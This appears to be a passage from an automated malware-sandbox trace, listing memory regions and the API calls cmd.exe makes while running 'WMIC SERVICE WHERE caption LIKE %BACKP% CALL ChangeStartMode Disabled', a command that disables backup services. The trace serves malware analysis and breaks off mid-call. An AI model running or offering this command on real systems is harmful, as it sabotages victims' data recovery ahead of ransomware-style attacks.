"private_0x00000000002b0000" filename = "" Region: id = 4394 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4395 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4396 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4397 start_va = 0x7e8d0000 end_va = 0x7e8f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8d0000" filename = "" Region: id = 4398 start_va = 0x7e8f6000 end_va = 0x7e8f6fff entry_point = 0x0 region_type = private name = "private_0x000000007e8f6000" filename = "" Region: id = 4399 start_va = 0x7e8fa000 end_va = 0x7e8fafff entry_point = 0x0 region_type = private name = "private_0x000000007e8fa000" filename = "" Region: id = 4400 start_va = 0x7e8fd000 end_va = 0x7e8fffff entry_point = 0x0 region_type = private name = "private_0x000000007e8fd000" filename = "" Region: id = 4401 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4402 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4403 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4404 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4405 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4406 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 4407 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4408 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4409 start_va = 0x4590000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 4410 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4451 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 4452 start_va = 0x2e0000 end_va = 0x39dfff entry_point = 0x2e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4453 start_va = 0x4410000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 4454 start_va = 0x4450000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 4455 start_va = 0x47b0000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 4456 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4457 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4458 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4459 start_va = 0x7e7d0000 end_va = 0x7e8cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7d0000" filename = "" Region: id = 4460 start_va = 0x7e8f7000 end_va = 0x7e8f9fff entry_point = 0x0 region_type = private name = "private_0x000000007e8f7000" filename = "" Region: id = 4461 start_va = 0x110000 end_va = 0x113fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4462 start_va = 0x120000 end_va = 0x123fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4463 start_va = 0x47c0000 end_va = 0x4af6fff entry_point = 0x47c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 295 os_tid = 0xff4 [0119.481] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0119.481] __set_app_type (_Type=0x1) [0119.481] __p__fmode () returned 0x77ac4d6c [0119.481] __p__commode () returned 0x77ac5b1c [0119.481] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0119.482] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0119.482] GetCurrentThreadId () returned 0xff4 [0119.482] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff4) returned 0x84 [0119.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0119.482] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0119.482] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.485] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.485] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fa04 | out: phkResult=0x28fa04*=0x0) returned 0x2 [0119.485] VirtualQuery (in: lpAddress=0x28fa0b, lpBuffer=0x28f9bc, dwLength=0x1c | out: lpBuffer=0x28f9bc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.485] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f9bc, dwLength=0x1c | out: lpBuffer=0x28f9bc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.485] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f9bc, dwLength=0x1c | out: lpBuffer=0x28f9bc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.485] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f9bc, dwLength=0x1c | out: lpBuffer=0x28f9bc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.485] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f9bc, dwLength=0x1c | out: lpBuffer=0x28f9bc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.485] GetConsoleOutputCP () returned 0x1b5 [0119.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0119.485] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0119.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0119.486] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0119.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0119.486] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0119.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0119.486] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0119.486] _get_osfhandle (_FileHandle=0) returned 0x38 [0119.486] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0119.486] _get_osfhandle (_FileHandle=0) returned 0x38 [0119.486] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0119.486] GetEnvironmentStringsW () returned 0x4597e00* [0119.487] FreeEnvironmentStringsA (penv="A") returned 1 [0119.487] GetEnvironmentStringsW () returned 0x4597e00* [0119.487] FreeEnvironmentStringsA (penv="A") returned 1 [0119.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e968 | out: phkResult=0x28e968*=0x94) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x40, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x1, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x1, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x0, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x40, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x40, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x40, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegCloseKey (hKey=0x94) returned 0x0 [0119.487] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e968 | out: phkResult=0x28e968*=0x94) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x40, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x1, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x1, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x0, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x9, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x4, lpData=0x28e974*=0x9, lpcbData=0x28e970*=0x4) returned 0x0 [0119.487] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e96c, lpData=0x28e974, lpcbData=0x28e970*=0x1000 | out: lpType=0x28e96c*=0x0, lpData=0x28e974*=0x9, lpcbData=0x28e970*=0x1000) returned 0x2 [0119.487] RegCloseKey (hKey=0x94) returned 0x0 [0119.487] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29828 [0119.487] srand (_Seed=0x5ad29828) [0119.487] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'" [0119.487] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'" [0119.487] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0119.488] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4599d58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0119.488] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0119.488] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.488] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.488] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.488] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.488] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.488] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.488] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.488] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.488] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.488] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.488] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.488] GetEnvironmentStringsW () returned 0x4597e00* [0119.488] FreeEnvironmentStringsA (penv="A") returned 1 [0119.488] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.488] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.488] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.488] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.488] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.488] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.488] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.488] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.488] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.488] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f740 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0119.489] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x28f740, lpFilePart=0x28f738 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x28f738*="Desktop") returned 0x1d [0119.489] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0119.489] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f4c0 | out: lpFindFileData=0x28f4c0) returned 0x45905c8 [0119.489] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0119.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x28f4c0 | out: lpFindFileData=0x28f4c0) returned 0x45905c8 [0119.489] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0119.489] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0119.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x28f4c0 | out: lpFindFileData=0x28f4c0) returned 0x45905c8 [0119.489] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0119.489] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0119.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0119.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0119.489] GetEnvironmentStringsW () returned 0x4597e00* [0119.489] FreeEnvironmentStringsA (penv="=") returned 1 [0119.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0119.490] GetConsoleOutputCP () returned 0x1b5 [0119.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0119.490] GetUserDefaultLCID () returned 0x409 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f870, cchData=128 | out: lpLCData="0") returned 2 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f870, cchData=128 | out: lpLCData="0") returned 2 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f870, cchData=128 | out: lpLCData="1") returned 2 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0119.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0119.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0119.491] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.491] GetConsoleTitleW (in: lpConsoleTitle=0x459aae8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.492] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0119.492] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0119.492] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0119.492] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0119.492] GetEnvironmentVariableW (in: lpName="BACKP", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.492] _wcsicmp (_String1="BACKP", _String2="CD") returned -1 [0119.492] _wcsicmp (_String1="BACKP", _String2="ERRORLEVEL") returned -3 [0119.492] _wcsicmp (_String1="BACKP", _String2="CMDEXTVERSION") returned -1 [0119.492] _wcsicmp (_String1="BACKP", _String2="CMDCMDLINE") returned -1 [0119.492] _wcsicmp (_String1="BACKP", _String2="DATE") returned -2 [0119.492] _wcsicmp (_String1="BACKP", _String2="TIME") returned -18 [0119.492] _wcsicmp (_String1="BACKP", _String2="RANDOM") returned -16 [0119.492] _wcsicmp (_String1="BACKP", _String2="HIGHESTNUMANODENUMBER") returned -6 [0119.493] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0119.493] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0119.493] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0119.493] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0119.493] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0119.493] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0119.493] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0119.494] GetConsoleTitleW (in: lpConsoleTitle=0x28f558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.494] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0119.494] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0119.494] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0119.494] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0119.494] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0119.494] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0119.494] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0119.494] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0119.495] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0119.495] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0119.495] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0119.495] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0119.495] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0119.495] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0119.495] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0119.495] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0119.495] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0119.495] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0119.495] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0119.495] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0119.495] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0119.495] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0119.495] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0119.495] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0119.495] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0119.495] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0119.495] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0119.495] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0119.495] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0119.495] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0119.495] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0119.495] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0119.495] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0119.495] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0119.495] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0119.495] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0119.495] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0119.495] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0119.495] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0119.495] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0119.496] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0119.496] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0119.496] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0119.496] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0119.496] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0119.496] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0119.496] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0119.496] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0119.496] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0119.496] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0119.496] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0119.496] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0119.496] _wcsicmp (_String1="WMIC", 